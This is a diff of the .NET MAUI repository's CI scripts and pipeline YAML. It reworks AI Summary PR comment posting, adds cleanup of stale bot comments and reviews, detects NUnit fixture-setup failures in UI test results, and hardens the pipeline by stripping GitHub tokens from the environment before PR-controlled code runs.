-            # to re-open all of them via a global regex replace, which forced
-            # every phase to expand on each new session.
-            $rx = [regex]::new('<details(?:\s+open)?>')
-            $block = $rx.Replace($block, '<details open>', 1)
-            $isFirst = $false
-        } else {
-            # Collapse the outer details of older sessions; leave inner phases alone.
-            $rx = [regex]::new('<details\s+open>')
-            $block = $rx.Replace($block, '<details>', 1)
-        }
-        $allSessions += $block
-    }
-
-    return ($allSessions -join "`n`n---`n`n")
-}
-
-# ============================================================================
 # FIND EXISTING COMMENT & BUILD FINAL BODY
 # ============================================================================
 
 Write-Host "Checking for existing review comment..." -ForegroundColor Yellow
-$existingBody = $null
 $existingCommentIds = @()
+$existingBodies = @()
 
 $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null
 if ($existingRaw) {
@@ -262,7 +209,6 @@ if ($existingRaw) {
         if ($existingObjs.Count -gt 0) {
             $existingCommentIds = @($existingObjs | ForEach-Object { $_.id })
             $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body })
-            $existingBody = $existingBodies -join "`n`n---`n`n"
             Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green
         }
     } catch {
@@ -286,32 +232,15 @@ if ($existingBodies -and $existingBodies.Count -gt 0) {
     }
 }
 
-if ($existingBody) {
-    # Merge new session into all existing AI Summary bodies before deleting the
-    # old comments. This keeps prior session history even if retries created
-    # multiple generated comments.
-    $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7
-
-    $commentBody = @"
+$commentBody = @"
 $MARKER
 
 ## 🤖 AI Summary
 
 $authorPing
 
-$mergedSessions$finalizeSection
+$newSessionBlock$finalizeSection
 "@
-} else {
-    $commentBody = @"
-$MARKER
-
-## 🤖 AI Summary
-
-$authorPing
-
-$newSessionBlock
-"@
-}
 
 # Clean up excessive blank lines
 $commentBody = $commentBody -replace "`n{4,}", "`n`n`n"

--- a/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1
+++ b/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1
@@ -27,14 +27,19 @@ BeforeAll {
             [int]$Failed,
             [int]$Skipped = 0,
             [string[]]$PassedTests = @(),
-            [string[]]$FailedTests = @()
+            [string[]]$FailedTests = @(),
+            [string]$FailedMessage = 'boom',
+            [string]$FailedStack = ''
         )
         $executed = $Total - $Skipped
+        $failedMessageXml = [System.Security.SecurityElement]::Escape($FailedMessage)
+        $failedStackXml = [System.Security.SecurityElement]::Escape($FailedStack)
+        $stackXml = if ([string]::IsNullOrEmpty($FailedStack)) { '' } else { "<StackTrace>$failedStackXml</StackTrace>" }
         $passedXml = ($PassedTests | ForEach-Object {
             "    <UnitTestResult testName=`"$_`" duration=`"00:00:01.0`" outcome=`"Passed`" />"
         }) -join "`n"
         $failedXml = ($FailedTests | ForEach-Object {
-            "    <UnitTestResult testName=`"$_`" duration=`"00:00:02.0`" outcome=`"Failed`"><Output><ErrorInfo><Message>boom</Message></ErrorInfo></Output></UnitTestResult>"
+            "    <UnitTestResult testName=`"$_`" duration=`"00:00:02.0`" outcome=`"Failed`"><Output><ErrorInfo><Message>$failedMessageXml</Message>$stackXml</ErrorInfo></Output></UnitTestResult>"
         }) -join "`n"
         @"
 <?xml version="1.0" encoding="utf-8"?>
@@ -128,12 +133,34 @@ Describe 'Get-AggregatedTrxFromDirectory (TRX walk + merge)' {
         $r[$cvKey].Total  | Should -Be 619
         $r[$cvKey].Passed | Should -Be 75
         $r[$cvKey].Failed | Should -Be 544
+        $r[$cvKey].SetupFailure | Should -Be $false
 
         $edKey = $r.Keys | Where-Object { $_ -match 'Editor' } | Select-Object -First 1
         $edKey | Should -Not -BeNullOrEmpty
         $r[$edKey].Total  | Should -Be 119
         $r[$edKey].Passed | Should -Be 51
         $r[$edKey].Failed | Should -Be 68
+    }
+
+    It 'marks category-wide fixture setup failures without changing TRX counters' {
+        $setupRoot = Join-Path $script:fixtureRoot 'setup-failure-test'
+        New-Item -ItemType Directory -Path $setupRoot -Force | Out-Null
+        $catDir = Join-Path $setupRoot 'drop-android_ui_tests-controls-WebView'
+        New-Item -ItemType Directory -Path $catDir -Force | Out-Null
+        New-TrxFixture -Path (Join-Path $catDir 'webview.trx') `
+            -Total 2 -Passed 0 -Failed 2 `
+            -FailedTests @('WebViewTest1','WebViewTest2') `
+            -FailedMessage 'OneTimeSetUp: System.TimeoutException : Timed out waiting for Go To Test button to appear' `
+            -FailedStack 'at Microsoft.Maui.TestUtils.DeviceTests.Runners.UITestBase.OneTimeSetup()'
+
+        $r = Get-AggregatedTrxFromDirectory -RootDir $setupRoot
+        $key = @($r.Keys)[0]
+
+        $r[$key].Total | Should -Be 2
+        $r[$key].Failed | Should -Be 2
+        $r[$key].SetupFailure | Should -Be $true
+        $r[$key].SetupFailureCount | Should -Be 2
+        $r[$key].SetupFailureMessage | Should -Match 'Go To Test button'
     }
 
     It 'sums multiple TRX files for the same category' {

--- a/.github/scripts/shared/Aggregate-UITestArtifacts.ps1
+++ b/.github/scripts/shared/Aggregate-UITestArtifacts.ps1
@@ -120,13 +120,18 @@ function Get-AggregatedTrxFromDirectory {
 
         if (-not $byCategory.ContainsKey($category)) {
             $byCategory[$category] = @{
-                Total        = 0
-                Passed       = 0
-                Failed       = 0
-                Skipped      = 0
-                Results      = @()
-                TrxPaths     = @()
-                ArtifactName = $artName
+                Total                      = 0
+                Passed                     = 0
+                Failed                     = 0
+                Skipped                    = 0
+                Results                    = @()
+                TrxPaths                   = @()
+                ArtifactName               = $artName
+                SetupFailure               = $false
+                SetupFailureCount          = 0
+                SetupFailureMessage        = ''
+                SetupFailureStack          = ''
+                SetupFailureSignatureCount = 0
             }
         }
         $cur = $byCategory[$category]
@@ -136,6 +141,41 @@ function Get-AggregatedTrxFromDirectory {
         $cur.Skipped += [int]$trxResult.Skipped
         $cur.Results = @($cur.Results) + @($trxResult.Results)
         $cur.TrxPaths = @($cur.TrxPaths) + @($trx.FullName)
+        $byCategory[$category] = $cur
+    }
+
+    foreach ($category in @($byCategory.Keys)) {
+        $cur = $byCategory[$category]
+        $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' })
+        if ($failedResults.Count -eq 0) {
+            continue
+        }
+
+        $setupFailures = @($failedResults | Where-Object {
+            $errorText = [string]($_.error)
+            $stackText = [string]($_.stack)
+            $errorText -match '^\s*OneTimeSetUp:' -or
+                $errorText -match 'Timed out waiting for Go To Test button to appear' -or
+                $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))'
+        })
+
+        if ($setupFailures.Count -ne $failedResults.Count) {
+            continue
+        }
+
+        $signatures = @{}
+        foreach ($failure in $setupFailures) {
+            $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim()
+            $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim()
+            $signatures["$errorText|$stackText"] = $true
+        }
+
+        $sample = $setupFailures | Select-Object -First 1
+        $cur.SetupFailure = $true
+        $cur.SetupFailureCount = $setupFailures.Count
+        $cur.SetupFailureMessage = ([string]($sample.error)).Trim()
+        $cur.SetupFailureStack = ([string]($sample.stack)).Trim()
+        $cur.SetupFailureSignatureCount = $signatures.Count
         $byCategory[$category] = $cur
     }
 

--- a/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1
+++ b/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1
@@ -18,13 +18,18 @@ function Get-AggregatedTrxFromDirectory {
 
         if (-not $byCategory.ContainsKey($category)) {
             $byCategory[$category] = @{
-                Total        = 0
-                Passed       = 0
-                Failed       = 0
-                Skipped      = 0
-                Results      = @()
-                TrxPaths     = @()
-                ArtifactName = $artName
+                Total                      = 0
+                Passed                     = 0
+                Failed                     = 0
+                Skipped                    = 0
+                Results                    = @()
+                TrxPaths                   = @()
+                ArtifactName               = $artName
+                SetupFailure               = $false
+                SetupFailureCount          = 0
+                SetupFailureMessage        = ''
+                SetupFailureStack          = ''
+                SetupFailureSignatureCount = 0
             }
         }
         $cur = $byCategory[$category]
@@ -34,6 +39,41 @@ function Get-AggregatedTrxFromDirectory {
         $cur.Skipped += [int]$trxResult.Skipped
         $cur.Results = @($cur.Results) + @($trxResult.Results)
         $cur.TrxPaths = @($cur.TrxPaths) + @($trx.FullName)
+        $byCategory[$category] = $cur
+    }
+
+    foreach ($category in @($byCategory.Keys)) {
+        $cur = $byCategory[$category]
+        $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' })
+        if ($failedResults.Count -eq 0) {
+            continue
+        }
+
+        $setupFailures = @($failedResults | Where-Object {
+            $errorText = [string]($_.error)
+            $stackText = [string]($_.stack)
+            $errorText -match '^\s*OneTimeSetUp:' -or
+                $errorText -match 'Timed out waiting for Go To Test button to appear' -or
+                $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))'
+        })
+
+        if ($setupFailures.Count -ne $failedResults.Count) {
+            continue
+        }
+
+        $signatures = @{}
+        foreach ($failure in $setupFailures) {
+            $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim()
+            $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim()
+            $signatures["$errorText|$stackText"] = $true
+        }
+
+        $sample = $setupFailures | Select-Object -First 1
+        $cur.SetupFailure = $true
+        $cur.SetupFailureCount = $setupFailures.Count
+        $cur.SetupFailureMessage = ([string]($sample.error)).Trim()
+        $cur.SetupFailureStack = ([string]($sample.stack)).Trim()
+        $cur.SetupFailureSignatureCount = $signatures.Count
         $byCategory[$category] = $cur
     }
 

--- a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1
+++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1
@@ -1,0 +1,185 @@
+#!/usr/bin/env pwsh
+
+$script:MauiBotCommentAuthors = @(
+    'MauiBot',
+    'maui-bot',
+    'maui-bot[bot]',
+    'github-actions[bot]'
+)
+
+$script:AiSummaryCommentMarker = '<!-- AI Summary -->'
+$script:AiGateCommentMarker = '<!-- AI Gate -->'
+$script:MergeConflictCommentMarker = '<!-- MAUI_BOT_MERGE_CONFLICT -->'
+$script:TryFixCommentMarker = '<!-- MAUI_BOT_TRY_FIX -->'
+
+function Test-IsMauiBotCommentAuthor {
+    param([object]$Comment)
+
+    $login = [string]$Comment.user.login
+    if ([string]::IsNullOrWhiteSpace($login)) {
+        return $false
+    }
+
+    return @($script:MauiBotCommentAuthors | Where-Object { $_ -ieq $login }).Count -gt 0
+}
+
+function Test-IsMergeConflictCommentBody {
+    param([string]$Body)
+
+    if ([string]::IsNullOrWhiteSpace($Body)) {
+        return $false
+    }
+
+    return $Body.Contains($script:MergeConflictCommentMarker) -or
+        ($Body.Contains('**Merge Conflict Detected**') -and $Body.Contains('This PR has merge conflicts with its target branch.'))
+}
+
+function Test-IsTryFixCommentBody {
+    param([string]$Body)
+
+    if ([string]::IsNullOrWhiteSpace($Body)) {
+        return $false
+    }
+
+    return $Body.Contains($script:TryFixCommentMarker) -or
+        ($Body.Contains('Automated review') -and $Body.Contains('alternative fix proposed')) -or
+        ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff'))
+}
+
+function Get-GitHubIssueComments {
+    param([Parameter(Mandatory = $true)][int]$PRNumber)
+
+    $raw = gh api "repos/dotnet/maui/issues/$PRNumber/comments?per_page=100" --paginate 2>$null
+    if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) {
+        return @()
+    }
+
+    try {
+        return @($raw | ConvertFrom-Json)
+    } catch {
+        Write-Host "  Warning: could not parse PR comments for cleanup: $_" -ForegroundColor Yellow
+        return @()
+    }
+}
+
+function Remove-StaleMauiBotIssueComments {
+    [CmdletBinding()]
+    param(
+        [Parameter(Mandatory = $true)]
+        [int]$PRNumber,
+
+        [switch]$IncludeAISummary,
+        [switch]$IncludeLegacyGate,
+        [switch]$IncludeMergeConflict,
+        [switch]$IncludeTryFix,
+
+        [string]$Reason = 'stale MauiBot comment',
+        [switch]$DryRun
+    )
+
+    $comments = Get-GitHubIssueComments -PRNumber $PRNumber
+    if (-not $comments -or $comments.Count -eq 0) {
+        return
+    }
+
+    $staleComments = @()
+    foreach ($comment in $comments) {
+        $body = [string]$comment.body
+        if ([string]::IsNullOrWhiteSpace($body)) {
+            continue
+        }
+
+        $matchesGeneratedMarker =
+            ($IncludeAISummary -and $body.Contains($script:AiSummaryCommentMarker)) -or
+            ($IncludeLegacyGate -and $body.Contains($script:AiGateCommentMarker))
+
+        $matchesBotOnlyContent =
+            (Test-IsMauiBotCommentAuthor $comment) -and (
+                ($IncludeMergeConflict -and (Test-IsMergeConflictCommentBody $body)) -or
+                ($IncludeTryFix -and (Test-IsTryFixCommentBody $body))
+            )
+
+        if ($matchesGeneratedMarker -or $matchesBotOnlyContent) {
+            $staleComments += $comment
+        }
+    }
+
+    foreach ($comment in $staleComments) {
+        if ($DryRun) {
+            Write-Host "  [DryRun] Would delete $Reason (comment ID: $($comment.id))" -ForegroundColor Magenta
+            continue
+        }
+
+        try {
+            Write-Host "  Deleting $Reason (comment ID: $($comment.id))..." -ForegroundColor Gray
+            $deleteOutput = gh api --method DELETE "repos/dotnet/maui/issues/comments/$($comment.id)" 2>&1
+            if ($LASTEXITCODE -ne 0) {
+                throw "DELETE failed (exit code $LASTEXITCODE): $deleteOutput"
+            }
+        } catch {
+            Write-Host "  Warning: could not delete $Reason comment $($comment.id): $_" -ForegroundColor Yellow
+        }
+    }
+}
+
+function Get-GitHubPullRequestReviews {
+    param([Parameter(Mandatory = $true)][int]$PRNumber)
+
+    $raw = gh api "repos/dotnet/maui/pulls/$PRNumber/reviews?per_page=100" --paginate 2>$null
+    if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) {
+        return @()
+    }
+
+    try {
+        return @($raw | ConvertFrom-Json)
+    } catch {
+        Write-Host "  Warning: could not parse PR reviews for cleanup: $_" -ForegroundColor Yellow
+        return @()
+    }
+}
+
+function Dismiss-StaleMauiBotTryFixReviews {
+    [CmdletBinding()]
+    param(
+        [Parameter(Mandatory = $true)]
+        [int]$PRNumber,
+
+        [string]$Reason = 'superseded MauiBot try-fix review',
+        [switch]$DryRun
+    )
+
+    $reviews = Get-GitHubPullRequestReviews -PRNumber $PRNumber
+    if (-not $reviews -or $reviews.Count -eq 0) {
+        return
+    }
+
+    $staleReviews = @($reviews | Where-Object {
+        (Test-IsMauiBotCommentAuthor $_) -and
+        ([string]$_.state -ieq 'CHANGES_REQUESTED') -and
+        (Test-IsTryFixCommentBody ([string]$_.body))
+    })
+
+    foreach ($review in $staleReviews) {
+        if ($DryRun) {
+            Write-Host "  [DryRun] Would dismiss $Reason (review ID: $($review.id))" -ForegroundColor Magenta
+            continue
+        }
+
+        $tmp = New-TemporaryFile
+        try {
+            @{ message = 'Superseded by a newer MauiBot review run.' } |
+                ConvertTo-Json -Compress |
+                Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline
+
+            Write-Host "  Dismissing $Reason (review ID: $($review.id))..." -ForegroundColor Gray
+            $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($review.id)/dismissals" --input $tmp.FullName 2>&1
+            if ($LASTEXITCODE -ne 0) {
+                throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput"
+            }
+        } catch {
+            Write-Host "  Warning: could not dismiss $Reason review $($review.id): $_" -ForegroundColor Yellow
+        } finally {
+            Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue
+        }
+    }
+}

--- a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1
+++ b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1
@@ -104,6 +104,28 @@ if ($Platform -eq "maccatalyst") {
     $Platform = "catalyst"
 }
 
+# ============================================================
+# Strip GH/Copilot tokens from environment for the duration of a
+# scriptblock that invokes PR-controlled code (dotnet test, MSBuild,
+# host-app, device tests). Trusted metadata fetches via `gh` CLI
+# (Detect-TestsInDiff, gh pr view) keep the token because they run
+# OUTSIDE this wrapper. See .github/instructions/ci-copilot-pipeline-security.instructions.md.
+# ============================================================
+function Invoke-WithoutGhTokens {
+    param([Parameter(Mandatory)][scriptblock]$ScriptBlock)
+    $saved = @{}
+    foreach ($n in @('GH_TOKEN','GITHUB_TOKEN','COPILOT_GITHUB_TOKEN')) {
+        $saved[$n] = [Environment]::GetEnvironmentVariable($n)
+        [Environment]::SetEnvironmentVariable($n, $null)
+    }
+    try { & $ScriptBlock }
+    finally {
+        foreach ($n in $saved.Keys) {
+            [Environment]::SetEnvironmentVariable($n, $saved[$n])
+        }
+    }
+}
+
 # Platform is required for UI and device tests, optional for unit/XAML tests
 if ($TestType -in @("UITest", "DeviceTest") -and -not $Platform) {
     throw "$TestType requires -Platform parameter (android, ios, catalyst, windows)."
@@ -354,7 +376,7 @@ function Invoke-TestRun {
                 $uiParams.DeviceUdid = $script:BootedDeviceUdid
             }
             # Capture all output — includes build, deploy, and test results
-            $scriptOutput = & $buildScript @uiParams 2>&1
+            $scriptOutput = Invoke-WithoutGhTokens { & $buildScript @uiParams 2>&1 }
             $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8
             return $LogFile
         }
@@ -379,7 +401,7 @@ function Invoke-TestRun {
                 $testArgs += @("--filter", $Filter)
             }
 
-            $scriptOutput = & dotnet @testArgs 2>&1
+            $scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 }
             $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8
             return $LogFile
         }
@@ -417,7 +439,7 @@ function Invoke-TestRun {
                 $testArgs += @("--filter", $Filter)
             }
 
-            $scriptOutput = & dotnet @testArgs 2>&1
+            $scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 }
             $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8
             return $LogFile
         }
@@ -459,7 +481,7 @@ function Invoke-TestRun {
                 $deviceParams.DeviceUdid = $script:BootedDeviceUdid
             }
 
-            $scriptOutput = & $deviceTestScript @deviceParams 2>&1
+            $scriptOutput = Invoke-WithoutGhTokens { & $deviceTestScript @deviceParams 2>&1 }
             $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8
             return $LogFile
         }

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -1511,15 +1511,10 @@ stages:
               } # end if ($byCat.Count -gt 0)
 
               if ($isDeferred) {
-                # ── DEFERRED MODE: Post full comment with deep results included ──
-                # Guard against duplicate comments on pipeline retry: check if
-                # an AI Summary comment already exists for this PR.
-                $existingComment = gh api "repos/dotnet/maui/issues/$prNumber/comments?per_page=100" --paginate --jq '.[] | select(.body | contains("<!-- AI Summary -->")) | .id' 2>$null | Select-Object -Last 1
-                if ($existingComment) {
-                  Write-Host "Existing AI Summary comment found ($existingComment) — will PATCH instead of creating new"
-                  $commentId = $existingComment
-                  $isDeferred = $false
-                }
+                # Keep deferred mode even if a prior AI Summary exists. The
+                # posting script preserves existing sessions, deletes stale
+                # generated comments, then posts a fresh unified comment.
+                Write-Host "Deferred AI Summary posting will clean up any stale generated comments before posting"
               }
 
               if ($isDeferred) {

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -644,7 +644,9 @@ stages:
 
           # ─────────────────────────────────────────────────────────
           #  Task 2 — GATE: UI detection, test runs, regression,
-          #  gate verification. NO tokens — only dotnet/build tools.
+          #  gate verification. GH_TOKEN is read-only here — needed
+          #  by Detect-TestsInDiff.ps1 for PR metadata/label fetches.
+          #  No COPILOT_GITHUB_TOKEN — the agent can't run here.
           # ─────────────────────────────────────────────────────────
           - bash: |
               echo "═══ TASK 2: GATE ═══"
@@ -667,6 +669,7 @@ stages:
             name: RunGate
             displayName: 'Task 2: Gate (test verification)'
             env:
+              GH_TOKEN: $(GH_COMMENT_TOKEN)
               PARAM_PR_NUMBER: ${{ parameters.PRNumber }}
 
           # ─────────────────────────────────────────────────────────

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -1278,6 +1278,7 @@ stages:
                 # from running.
                 Write-Host "##vso[task.logissue type=warning]One or more deep UI test categories failed (see TRX in drop-deep-uitests artifact)"
               }
+              exit 0
             displayName: 'Run deep UI tests (per-category loop)'
             timeoutInMinutes: 220
 
@@ -1412,6 +1413,7 @@ stages:
 
               # Render the new STEP 3 section.
               $totalPassed = 0; $totalFailed = 0
+              $setupFailureCategories = 0; $setupImpactedTests = 0; $emptyCategories = 0
               $sb = [System.Text.StringBuilder]::new()
               [void]$sb.AppendLine()
               [void]$sb.AppendLine("### 🧪 UI Test Execution Results (deep, platform pool)")
@@ -1419,6 +1421,7 @@ stages:
               [void]$sb.AppendLine("| Category | Tests | Snapshot diffs |")
               [void]$sb.AppendLine("|---|---|---|")
               $perCategoryFailures = [ordered]@{}
+              $perCategorySetupFailures = [ordered]@{}
               foreach ($k in ($byCat.Keys | Sort-Object)) {
                 $b = $byCat[$k]
                 $totalPassed += [int]$b.Passed
@@ -1426,7 +1429,16 @@ stages:
                 $tCount = [int]$b.Total
                 $tPass  = [int]$b.Passed
                 $tFail  = [int]$b.Failed
-                $col = if ($tCount -eq 0) { '—' }
+                $isSetupFailure = ($b.ContainsKey('SetupFailure') -and [bool]$b.SetupFailure)
+                if ($isSetupFailure) {
+                  $setupFailureCategories++
+                  $setupImpactedTests += [int]$b.SetupFailureCount
+                }
+                if ($tCount -eq 0) {
+                  $emptyCategories++
+                }
+                $col = if ($tCount -eq 0) { '0 tests' }
+                       elseif ($isSetupFailure) { "$tPass/$tCount (setup failed; $tFail marked failed)" }
                        elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" }
                        else { "$tPass/$tCount ✓" }
                 # Count snapshot-diff PNGs we shipped in this artifact subdir
@@ -1441,6 +1453,15 @@ stages:
                 # Capture failed test entries from the parsed TRX so we can
                 # render a per-category disclosure section listing the actual
                 # failing test names + the first line of their error message.
+                if ($isSetupFailure) {
+                  $perCategorySetupFailures[$k] = [pscustomobject]@{
+                    Count          = [int]$b.SetupFailureCount
+                    Message        = $b.SetupFailureMessage -as [string]
+                    Stack          = $b.SetupFailureStack -as [string]
+                    SignatureCount = [int]$b.SetupFailureSignatureCount
+                  }
+                  continue
+                }
                 $catFailed = @()
                 foreach ($r in @($b.Results)) {
                   if ($r.status -eq 'Failed') {
@@ -1453,6 +1474,41 @@ stages:
                 }
                 if ($catFailed.Count -gt 0) {
                   $perCategoryFailures[$k] = $catFailed
+                }
+              }
+
+              # Fixture setup failures usually mark every test in the fixture as
+              # failed even though no individual test body ran. Render one
+              # representative setup error instead of dozens of duplicate tests.
+              if ($perCategorySetupFailures.Count -gt 0) {
+                [void]$sb.AppendLine()
+                foreach ($cat in $perCategorySetupFailures.Keys) {
+                  $info = $perCategorySetupFailures[$cat]
+                  $setupCount = [int]$info.Count
+                  $setupTestText = if ($setupCount -eq 1) { '1 test' } else { "$setupCount tests" }
+                  [void]$sb.AppendLine("<details><summary>⚠️ <code>$cat</code> — fixture setup failed for $setupTestText</summary>")
+                  [void]$sb.AppendLine("<br/>")
+                  [void]$sb.AppendLine()
+                  [void]$sb.AppendLine("NUnit reported a `OneTimeSetUp`/fixture setup failure before test bodies ran; the TRX marked each affected test failed.")
+                  if ([int]$info.SignatureCount -gt 1) {
+                    [void]$sb.AppendLine()
+                    [void]$sb.AppendLine("_Multiple setup failure signatures were present; showing the first one. See the TRX artifact for all details._")
+                  }
+                  $errText = if (-not [string]::IsNullOrWhiteSpace($info.Message)) { $info.Message.Trim() } else { '' }
+                  $stackText = if (-not [string]::IsNullOrWhiteSpace($info.Stack)) { $info.Stack.Trim() } else { '' }
+                  $combined = $errText
+                  if ($stackText) { $combined = $combined + [Environment]::NewLine + $stackText }
+                  if ($combined.Length -gt 1500) { $combined = $combined.Substring(0, 1500) + [Environment]::NewLine + '...' }
+                  if ($combined) {
+                    [void]$sb.AppendLine()
+                    $fence = [string]::new([char]96, 3)
+                    [void]$sb.AppendLine($fence)
+                    [void]$sb.AppendLine($combined)
+                    [void]$sb.AppendLine($fence)
+                  }
+                  [void]$sb.AppendLine()
+                  [void]$sb.AppendLine("</details>")
+                  [void]$sb.AppendLine()
                 }
               }
 
@@ -1503,7 +1559,23 @@ stages:
               [void]$sb.AppendLine()
 
               $resultIcon = if ($totalFailed -gt 0) { '❌' } elseif ($totalPassed -gt 0) { '✅' } else { '⏭️' }
-              $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $($byCat.Count) categor$(if ($byCat.Count -eq 1) {'y'} else {'ies'}) on platform-pool agent (replaces in-process counts above)."
+              $categoryText = if ($byCat.Count -eq 1) { '1 category' } else { "$($byCat.Count) categories" }
+              $regularFailed = [Math]::Max(0, $totalFailed - $setupImpactedTests)
+              if ($setupFailureCategories -gt 0) {
+                $setupCategoryText = if ($setupFailureCategories -eq 1) { '1 category setup failure' } else { "$setupFailureCategories category setup failures" }
+                $setupImpactedText = if ($setupImpactedTests -eq 1) { '1 impacted test' } else { "$setupImpactedTests impacted tests" }
+                if ($regularFailed -eq 0) {
+                  $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed; $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)."
+                } else {
+                  $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $regularFailed failed, plus $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)."
+                }
+              } else {
+                $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $categoryText on platform-pool agent (replaces in-process counts above)."
+              }
+              if ($emptyCategories -gt 0) {
+                $emptyText = if ($emptyCategories -eq 1) { '1 category reported 0 tests.' } else { "$emptyCategories categories reported 0 tests." }
+                $headerLine = "$headerLine $emptyText"
+              }
 
               $beginMarker = '<!-- DEEP_UITESTS_BEGIN -->'
               $endMarker   = '<!-- DEEP_UITESTS_END -->'

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -821,12 +821,20 @@ stages:
   - stage: RunDeepUITests
     displayName: 'Deep UI Tests (platform pool)'
     dependsOn: ReviewPR
-    condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE'))
+    # Prefer AI-refreshed categories from CopilotReview (RunReview) when available,
+    # falling back to Gate-detected categories (RunGate). RunReview is only set when
+    # the Tier 3 AI refresh actually changed the categories; otherwise it's empty.
+    condition: >-
+      and(
+        in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'),
+        ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), ''),
+        ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), 'NONE')
+      )
     jobs:
       - job: RunUITests
         displayName: 'Run detected UI test categories'
         variables:
-          detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ]
+          detectedCategories: $[ coalesce(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'], stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']) ]
         # Use the SAME platform-pool selection logic as the CopilotReview
         # job — the deep-test agent should be the right OS for the
         # requested target platform.

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -726,7 +726,7 @@ stages:
               fi
 
               echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/"
-            name: RunPost                       # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.<var>'])
+            name: RunPost                       # Stage 3 (UpdateAISummaryComment) reads aiSummaryCommentId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId']). Note: detectedCategories comes from RunGate, not RunPost.
             displayName: 'Task 4: Post (comments + labels)'
             env:
               GH_TOKEN: $(GH_COMMENT_TOKEN)

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -619,6 +619,7 @@ stages:
               mkdir -p "$TRUSTED"
               cp -r .github/scripts "$TRUSTED/scripts"
               cp -r .github/skills  "$TRUSTED/skills"
+              chmod -R a-w "$TRUSTED"
               echo "Trusted scripts copied to $TRUSTED"
 
               # Run Setup phase (branch checkout + PR merge)
@@ -855,6 +856,7 @@ stages:
         steps:
           - checkout: self
             fetchDepth: 0
+            persistCredentials: false
 
           # Bring in .NET + workloads + tasks DLL — same prerequisites the
           # CopilotReview job used. Reusing the install-dotnet template
@@ -1326,6 +1328,7 @@ stages:
         timeoutInMinutes: 30
         steps:
           - checkout: self
+            persistCredentials: false
 
           - task: DownloadPipelineArtifact@2
             displayName: 'Download CopilotLogs'

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -12,8 +12,7 @@ pr: none  # Not triggered by PRs
 parameters:
   - name: PRNumber
     displayName: 'Pull Request Number'
-    type: string
-    default: ''
+    type: number
 
   - name: Platform
     displayName: 'Target Platform'
@@ -80,7 +79,10 @@ stages:
         steps:
